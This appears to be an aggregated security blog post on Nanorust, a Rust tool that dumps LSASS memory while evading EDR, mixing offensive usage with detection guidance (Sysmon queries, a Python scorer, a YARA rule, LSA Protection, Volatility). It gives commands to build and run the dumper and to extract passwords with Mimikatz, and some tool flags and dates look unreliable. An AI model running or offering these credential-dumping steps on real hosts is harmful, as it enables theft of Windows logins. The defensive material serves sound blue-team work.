Nanorust: The Rust-Powered LSASS Memory Dumper That’s Making EDRs Sweat + Video


Introduction:

The eternal cat-and-mouse game between red team operators and endpoint detection has just escalated with Nanorust—a Rust-based rewrite of the infamous Nanodump tool that specifically targets LSASS processes where Windows credentials live. By leveraging advanced syscall obfuscation techniques including Hell’s Gate and Tartarus Gate, this tool represents a significant evolution in how attackers can bypass security monitoring to extract sensitive authentication data directly from memory.

Learning Objectives:

  • Understand how Nanorust implements Hell’s Gate and Tartarus Gate syscall techniques to evade EDR hooks
  • Master the handle duplication method for accessing LSASS without direct process opening
  • Deploy and configure Nanorust in controlled red team environments for credential harvesting exercises
  • Identify detection signatures and implement mitigation strategies against such memory dumping attacks

You Should Know:

1. Building and Deploying Nanorust on Windows Targets

Nanorust requires Rust 1.88+ and specifically targets x64 Windows systems. The build process is straightforward but requires proper environment setup:

# Install Rust if not already present (PowerShell as administrator)
winget install Rustlang.Rustup

# Verify installation
rustc --version
cargo --version

# Clone the Nanorust repository
git clone https://github.com/Hakumarachi/Nanorust.git
cd Nanorust

# Build the release version with optimizations
cargo build --release

# The compiled binary will be at .\target\release\nanorust.exe

What this does: Compiles the Nanorust memory dumping tool with full optimizations, creating a standalone executable that implements all evasion techniques.

2. Hell’s Gate and Tartarus Gate: Syscall Evasion Explained

Nanorust implements Hell’s Gate, a technique that reads the syscall numbers straight out of ntdll.dll’s in-memory stubs at runtime and then issues the syscalls itself, so the hooked ntdll exports that user-mode EDR sensors rely on are never called. Here’s how to verify this behavior:

# Sysmon does not log syscall names; its ProcessAccess events (Event ID 10) record which process
# opened LSASS, with what access mask, and the call stack it came from (requires a Sysmon config that logs lsass.exe targets)
Get-WinEvent -FilterHashtable @{ LogName = "Microsoft-Windows-Sysmon/Operational"; Id = 10 } |
Where-Object { $_.Message -match "TargetImage:.*lsass\.exe" } |
Select-Object TimeCreated, Message -First 10

# Check if Nanorust is bypassing user-mode hooks using API Monitor
# Download API Monitor from http://www.rohitab.com/apimonitor
# Attach to the nanorust.exe process and filter for Nt* calls: a direct-syscall implementation
# leaves no trace in the hooked ntdll exports that API Monitor watches

The Tartarus Gate enhancement extends Hell’s Gate by adding indirect syscall invocation, making detection even more challenging.

3. Handle Duplication Technique for LSASS Access

One of Nanorust’s stealthiest features is handle duplication—instead of directly opening LSASS (which triggers alerts), it duplicates an existing handle:

// Conceptual C# code showing handle duplication (for educational purposes)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

class HandleDuplicationDemo
{
    // OBJECT_ATTRIBUTES and CLIENT_ID are the standard ntdll structures;
    // their definitions are omitted in this sketch
    [DllImport("ntdll.dll", SetLastError = true)]
    static extern int NtOpenProcess(ref IntPtr ProcessHandle, uint AccessMask,
        ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId);

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern int NtDuplicateObject(IntPtr SourceProcessHandle,
        IntPtr SourceHandle, IntPtr TargetProcessHandle, out IntPtr TargetHandle,
        uint DesiredAccess, uint HandleAttributes, uint Options);

    // Find a process with a handle to LSASS and duplicate it
    static void DuplicateLsassHandle()
    {
        // Implementation would enumerate process handles and duplicate
        // those pointing to LSASS process ID
    }
}

4. Executing Nanorust for Credential Extraction

Once compiled, executing Nanorust requires understanding its command-line options:

# Basic execution (dumps LSASS to default location)
.\nanorust.exe

# Specify custom output file
.\nanorust.exe -o C:\temp\lsass.dmp

# Use handle duplication method specifically
.\nanorust.exe --duplicate-handle

# Combine with process injection for added stealth
.\nanorust.exe --inject --target-pid 1234

# Verify successful dump
dir C:\temp\lsass.dmp

# Analyze the dump with Mimikatz (on attacker machine)
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

5. Detecting and Mitigating Nanorust Attacks

Blue team members can implement these detection measures:

# PowerShell detection script for LSASS access anomalies
$lsass = Get-Process lsass -ErrorAction SilentlyContinue
if ($lsass) {
    $lsassId = $lsass.Id   # kept for correlating PIDs in the events below

    # Monitor for processes accessing LSASS
    # (4656/4663 only fire for lsass.exe when an audit SACL is set on the process object)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Security'
        ID = 4656, 4663  # Handle access events
    } | Where-Object { $_.Message -match "lsass\.exe" } |
    Format-Table TimeCreated, Message -AutoSize

    # Check for suspicious process creation
    Get-WinEvent -LogName 'Security' -FilterXPath `
        "*[System[EventID=4688]]" |
    Where-Object { $_.Message -match 'nanorust|lsass' } |
    Select-Object TimeCreated, Message
}

# Enable PPL (Protected Process Light) for LSASS
# Add registry value to enable LSA Protection
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
    -Name "RunAsPPL" -Value 1 -PropertyType DWord -Force

# Restart for changes to take effect
# This prevents non-PPL processes from accessing LSASS
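As an added illustration of the Sysmon-based detection this section and the Key Takeaways call for (example code written for this article, not part of Nanorust or of the original post), the Python below scores Sysmon ProcessAccess (Event ID 10) records against LSASS on three signals: an unexpected source process, the PROCESS_VM_READ / PROCESS_DUP_HANDLE bits in the granted access mask, and call-stack frames that Sysmon could not map to a loaded module, which is what a direct-syscall implementation leaves behind. The log lines are constructed, and the allowlist and flattened field layout are assumptions to tune for your environment.

```python
import re

# Sysmon Event ID 10 records flattened to "Field: value" pairs joined by " | " (constructed sample data)
SAMPLE_EVENTS = [
    "SourceImage: C:\\Windows\\System32\\csrss.exe | TargetImage: C:\\Windows\\System32\\lsass.exe"
    " | GrantedAccess: 0x1FFFFF | CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d5a4",
    "SourceImage: C:\\Users\\Public\\nanorust.exe | TargetImage: C:\\Windows\\System32\\lsass.exe"
    " | GrantedAccess: 0x1010 | CallTrace: UNKNOWN(00007FF6A0C012F0)|UNKNOWN(00007FF6A0C0140A)",
    "SourceImage: C:\\Users\\Public\\helper.exe | TargetImage: C:\\Windows\\System32\\lsass.exe"
    " | GrantedAccess: 0x0040 | CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d5a4",
    "SourceImage: C:\\Program Files\\App\\app.exe | TargetImage: C:\\Windows\\System32\\svchost.exe"
    " | GrantedAccess: 0x1010 | CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d5a4",
]

PROCESS_VM_READ = 0x0010     # needed to read LSASS memory
PROCESS_DUP_HANDLE = 0x0040  # needed to duplicate handles out of another process
# Processes that touch LSASS on a default install (assumed baseline; tune per environment)
ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe", "svchost.exe"}
FIELD_RE = re.compile(r"(\w+): (.*?)(?= \| \w+: |$)")

def parse_event(line):
    return dict(FIELD_RE.findall(line))

def score_event(ev):
    """Return the reasons an event looks like LSASS dumping; an empty list means benign."""
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return []
    source = ev.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
    trace = ev.get("CallTrace", "")
    if source in ALLOWLIST and "UNKNOWN" not in trace:
        return []  # expected OS component using a module-backed call path
    access = int(ev.get("GrantedAccess", "0"), 16)
    reasons = [] if source in ALLOWLIST else [f"unexpected source process {source}"]
    if access & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ granted (memory read)")
    if access & PROCESS_DUP_HANDLE:
        reasons.append("PROCESS_DUP_HANDLE granted (handle duplication path)")
    # Frames not backed by any mapped module ("UNKNOWN") mean the call did not go
    # through ntdll's exported stubs: the pattern a direct-syscall implementation leaves
    if "UNKNOWN" in trace:
        reasons.append("unbacked call-stack frames (direct syscall indicator)")
    return reasons

def analyze(lines):
    hits = {}
    for ev in map(parse_event, lines):
        reasons = score_event(ev)
        if reasons:
            hits[ev["SourceImage"]] = reasons
    return hits
```

Running analyze(SAMPLE_EVENTS) flags nanorust.exe on all three signals and helper.exe on the duplication bit alone, while csrss.exe (full access, but module-backed stack) and the non-LSASS access are left alone.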

6. Linux Cross-Compilation for Windows Targets

Security researchers can cross-compile Nanorust from Linux:

# Install cross-compilation target
rustup target add x86_64-pc-windows-gnu

# Install MinGW for Windows linking
sudo apt install mingw-w64

# Cross-compile
cargo build --release --target x86_64-pc-windows-gnu

# The Windows executable will be at:
# ./target/x86_64-pc-windows-gnu/release/nanorust.exe

7. Advanced Evasion: Combining with Process Hollowing

For red team exercises, Nanorust can be combined with process hollowing:

// Conceptual Rust code for process hollowing (simplified)
use windows::Win32::System::Diagnostics::Debug::*;
use windows::Win32::System::Threading::*;
use windows::Win32::Foundation::*;

unsafe fn hollow_process(target_path: &str) -> Result<(), Box<dyn std::error::Error>> {
    // 1. Create suspended process
    // 2. Unmap original executable memory
    // 3. Allocate memory and write Nanorust payload
    // 4. Set entry point and resume thread

    Ok(())
}

8. YARA Rules for Nanorust Detection

Create YARA rules to identify Nanorust binaries:

rule Nanorust_Memory_Dumper {
    meta:
        description = "Detects Nanorust LSASS memory dumper"
        author = "Security Research"
        date = "2024-01-15"

    strings:
        $s1 = "NtOpenProcess" wide ascii
        $s2 = "NtReadVirtualMemory" wide ascii
        $s3 = "Hell's Gate" wide ascii
        $s4 = "Tartarus Gate" wide ascii
        $s5 = "lsass.exe" wide ascii nocase
        $s6 = "duplicate-handle" wide ascii

    condition:
        3 of ($s*) or (all of ($s1, $s2, $s5))
}

9. Memory Forensics to Detect Past Attacks

Use Volatility 3 to identify LSASS dumping artifacts:

# Install volatility3
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

# Analyze memory dump for LSASS access
python vol.py -f memory.dump windows.cmdline.CmdLine

# Check for process handle leaks (use the PID of a suspect process, or of LSASS itself, from the pslist output)
python vol.py -f memory.dump windows.handles.Handles --pid <PID>

# Look for suspicious memory sections
python vol.py -f memory.dump windows.malfind.Malfind

# Verify if LSASS was accessed by non-system processes
python vol.py -f memory.dump windows.pslist.PsList

What Undercode Say:

Key Takeaway 1: Nanorust represents a dangerous evolution in credential dumping tools by combining Rust’s performance with advanced syscall evasion techniques. Its implementation of Hell’s Gate and Tartarus Gate makes it significantly harder for traditional EDR solutions that rely on user-mode API hooking to detect malicious LSASS access.

Key Takeaway 2: The handle duplication technique is particularly concerning because it leverages legitimate process interactions—finding a process that already has a handle to LSASS and duplicating it bypasses the need to call NtOpenProcess directly, which is heavily monitored.

The shift to Rust for malware development is accelerating because it provides memory safety without garbage collection, produces smaller binaries, and offers better cross-platform capabilities. For blue teams, this means updating detection strategies to focus on abnormal memory access patterns rather than simple API call monitoring. Implementing LSA Protection (RunAsPPL), Credential Guard, and aggressive handle auditing are essential countermeasures. Organizations should also deploy Sysmon with comprehensive rule sets that flag any process attempting to read LSASS memory, regardless of how the handle was obtained. The arms race continues, and tools like Nanorust ensure that security professionals must constantly evolve their defensive strategies.

Prediction:

Within the next 6-12 months, we’ll see mainstream EDR vendors releasing signature updates specifically targeting Nanorust’s syscall patterns, followed by the emergence of Rust-based offensive toolkits that combine multiple evasion techniques (Hell’s Gate, Tartarus Gate, and Halos Gate) into unified frameworks. Simultaneously, Microsoft will likely enhance LSASS protections in Windows 12 or through cumulative updates, possibly requiring TPM-backed isolation for LSA processes. This will push attackers toward alternative credential access methods, including memory scraping of other processes and cloud authentication token theft.

Reported By: Splog Nanorust – Hackers Feeds